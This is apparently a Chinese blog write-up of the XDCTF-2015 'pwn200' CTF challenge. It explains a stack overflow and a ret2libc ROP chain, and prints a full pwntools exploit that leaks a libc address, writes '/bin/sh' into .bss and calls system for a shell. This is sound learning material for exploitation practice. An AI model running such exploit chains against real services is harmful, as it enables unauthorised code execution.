pwn200

---XDCTF-2015

每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了一些东西,因为害怕忘记,写个博客记录记录。

1.获取pwn题

啪的一下就下载好了。

2.查看保护

拿到题我不做,哎,我干什么呢,我先查看保护!



裸奔题,开的东西不多,所以这里就看我们发挥了

3.ida看看



首先可以很明显的看到,给的7个变量,在栈中是连续排列的,一开始我还不知道给这里的七个数赋值到底有什么用,我们继续往下看

这里的setbuf还把我搞蒙了一下,平时不是一般setbuf都是用来平衡栈帧的,但是今天这里涉及了&buf,我还以为我多输入的数据就会存在缓冲区里面呢有其他的用处呢,结果是我想多了,但是也侧面说明了我其实基础知识不够ok。

另外就是一个write函数在这里打印出来我们赋给变量的数值那么我们可以使用gdb调试进去看一看:



发现就是一串文字,然后继续看ida:



发现另外就有一个溢出函数,因为程序没有开gs,所以确定是可以溢出的。

使用cyclic 200,查看溢出发现是112

那么下一步我们查看一下有无可以直接跳转利用的函数



发现没有跳转的system函数,也没有第一时间看见bin/sh链,那么可以确定这是十分经典的ret2libc了,构建rop链,那么我可以写出前半部分的exp代码:

from pwn import *
from LibcSearcher import* context.log_level='debug' p=process("./pwn200") e=ELF("./pwn200") read_got=e.got["read"]
read_plt=e.plt['read']
write_plt=e.plt["write"]
bss_add=e.bss()
pop_add=0x0804856c
init=0x80483d0 fun=0x8048484
payload='a'*112+p32(write_plt)+p32(fun)+p32(1)+p32(read_got)+p32(4) p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(payload)
read_add=u32(p.recv(4))
print hex(read_add)

那至于网上好多人说使用什么dynelf函数来算,我也试了,因为最近github又登陆不上去,使用这个函数是需要下载想对的库的,网上查找资料后了解到,其实libcseracher和dynekf都是通过暴露出来的地址来查找对应的libc库的,但是libcseracher明显需要写的东西很少,而且功能更强,所以我们这里直接使用libcseracher!!!

另外第一个payload这里的p32(fun)的地址也可以换成start函数的地址,至于为什么不换成main函数的,是为了保持栈帧平衡。以及这里可以考虑通过write函数去暴露write函数的真实地址也可以选择暴露read函数实地址

另外这里通过已经暴露出来的计算基址,然后获得system函数的真实地址

另外这道题给我另外的一个反思点是什么呢,就是没有bin_sh的时候可以选择通过一个输入函数往bss段里面输入"/bin/sh"这样去构造,而不是一味的去查找,反正这道题我是没有查到的,但是我看其他人写的题解上面是有查到的

我通过ropgadget没有查找到,所以我们选择:

bss_add = elf.bss()
payload='a'*112+p32(read_plt)+p32(pop_add)+p32(0)+p32(bss_add)+p32(8)+p32(system_add)+p32(fun)+p32(bss_add)
p.sendline(payload)
p.sendline("/bin/sh")

通过写函数给bss段写入我们的命令去使用,另外值得注意的是我们read函数在写完之后如何才能跳转到我们的system函数,这之间是需要三次pop的,所以综上exp如下:

from pwn import *
from LibcSearcher import* context.log_level='debug' p=process("./pwn200") e=ELF("./pwn200") read_got=e.got["read"]
read_plt=e.plt['read']
write_plt=e.plt["write"]
bss_add=e.bss()
pop_add=0x0804856c
init=0x80483d0 fun=0x8048484
payload='a'*112+p32(write_plt)+p32(fun)+p32(1)+p32(read_got)+p32(4) p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(payload)
read_add=u32(p.recv(4))
print hex(read_add)
obj = LibcSearcher('read',read_add) base=read_add-obj.dump('read') system_add=base+obj.dump('system')
print 'sys---'+hex(system_add)
print 'base---'+hex(base)
pause()
payload='a'*112+p32(read_plt)+p32(pop_add)+p32(0)+p32(bss_add)+p32(8)+p32(system_add)+p32(fun)+p32(bss_add) p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()

另外小插曲是我的libcseracher好像里面自带的库很少,所以暴露出来libc库计算得到的system函数的地址都是不合适的,然后学长还在他的电脑上面试了试,发现不是思路的问题,而是库的数量不够的问题。

玄学问题给爷爬!!!



可以看到在别人kali就ookk,我这个就不行,还就那个烦的一!!!

pwn200,一道不完全考察ret2libc的小小pwn题的更多相关文章

  1. 由一道CTF pwn题深入理解libc2.26中的tcache机制

    本文首发安全客:https://www.anquanke.com/post/id/104760 在刚结束的HITB-XCTF有一道pwn题gundam使用了2.26版本的libc.因为2.26版本中加 ...

  2. 什么是data:image/png;base64,?一道关于Data URI Scheme的入门级CTF_Web题

    一道关于Data URI Scheme的入门级CTF_Web题 0x00 题目描述 这是偶尔遇到的某网安交流群的入群题,题目没有任何的提示,直接给了一个txt文件. 0x01 解题过程 通过给的这个文 ...

  3. 通过一道简单的例题了解Linux内核PWN

    写在前面 这篇文章目的在于简单介绍内核PWN题,揭开内核的神秘面纱.背后的知识点包含Linux驱动和内核源码,学习路线非常陡峭.也就是说,会一道Linux内核PWN需要非常多的铺垫知识,如果要学习可以 ...

  4. 一道在知乎很火的 Java 题——如何输出 ab【转】

    这是一个源自知乎的话题,原贴链接:一道百度的面试题,有大神会嘛? 虽然我不是大神,但我也点进去看了一下,思考了一会之后有了一些思路,然后去看其它人的答案的时候果然全都已经被各路大神们先想到并贴出来了, ...

  5. 一道并查集的(坑)题:关闭农场closing the farm

    题目描述 in English: Farmer John and his cows are planning to leave town for a long vacation, and so FJ ...

  6. 一道考验你设计能力的C++编程题

    http://www.cppblog.com/weiym/archive/2012/06/12/178472.html

  7. 算法(JAVA)----两道小小课后题

    LZ最近翻了翻JAVA版的数据结构与算法,无聊之下将书中的课后题一一给做了一遍,在此给出书中课后题的答案(非标准答案,是LZ的答案,猿友们可以贡献出自己更快的算法). 1.编写一个程序解决选择问题.令 ...

  8. B - Reverse and Compare 小小思维题

    http://agc019.contest.atcoder.jp/tasks/agc019_b 一开始的做法是, 用总数减去回文子串数目,因为回文子串怎么翻转都不影响答案. 然后,如果翻转afucka ...

  9. 百度杯 十一月 的一道pwn题复现

    拿到题后,就直接开鲁.. /ctf/pwn# checksec pwnme [*] '/ctf/pwn/pwnme' Arch: amd64--little RELRO: Full RELRO Sta ...

随机推荐

  1. Linux高级之语句表达式

    表达式 表达式和语句是 C 语言中的基础概念.什么是表达式呢?表达式就是由一系列操作符和操作数构成的式子.操作符可以是 C 语言标准规定的各种算术运算符.逻辑运算符.赋值运算符.比较运算符等.操作数可 ...

  2. noip模拟测试52

    这套题总体来说比较简单,但是有一些分数我没有拿到,先说T1,我10分钟左右打完了60分的暴力,然后就开始打表找规律,好像只有我去找了循环节,找规律找了一个多小时,到八点四十的时候我还没有正解做法,就直 ...

  3. easyui修复浏览器刷新后,tab页全部关闭的问题

    一.问题描述 使用easyui搭建的上左右页面布局,当我们在右侧打开了tab页,发现点击浏览器的刷新按钮后,整个页面会被重新渲染,导致所有打开的tab页都被关闭,回到初始状态的问题. 这个问题虽然不影 ...

  4. [第八篇]——Docker 容器使用之Spring Cloud直播商城 b2b2c电子商务技术总结

    Docker 客户端 docker 客户端非常简单 ,我们可以直接输入 docker 命令来查看到 Docker 客户端的所有命令选项. xxx@xxx:~# docker 可以通过命令  docke ...

  5. 如何在win10中Java中JDK的安装和path,classpath的环境配置

    1,第一步,不用说肯定是去下一个java JDK了.目前最新版本的java JDK应该是JDK 7.0,这个就自己去百度一下了,好多网站都可以找到.2,第二步就是安装JDK虚拟机了,按照它里面的提示一 ...

  6. 优雅的编码,使用Optional代替if-else

    Optional是JAVA8引入的类,它其实是一个包装类,可以对所有对象进行包装, 包括null,这个特性使得我们编码可以优雅的解决空指针异常. 先编写一些测试类 class Student { pr ...

  7. # Zombie Gunship Survival(僵尸炮艇生存)GG修改器修改教程

    Zombie Gunship Survival(僵尸炮艇生存)GG修改器修改教程 1.修改伤害,打击范围,武器冷却时间,子弹容量 测试手机机型:华为畅享7 系统版本:Android7.0 是否ROOT ...

  8. 重学VUE——vue 常用指令有哪些?

    一.什么是指令? 在 vue 中,指令以 v- 开头,是一种特殊的自定义行间属性.指令属性的预期值是一个表达式,指令的职责就是:表达式的值改变时,相应地将某些行为应用到DOM上.只有v-for是一个类 ...

  9. C# lambda 实现 Ascii 排序

    var dir = new Dictionary<string, string>();            dir.Add("channelId", "1& ...

  10. javascript 字符串反转 strip_tags 字符串常用的自定义函数,加载css etc.

    字符串反转 String.prototype.reverse = function() { var a = this.split(''); for (var i = 0, j = a.length-1 ...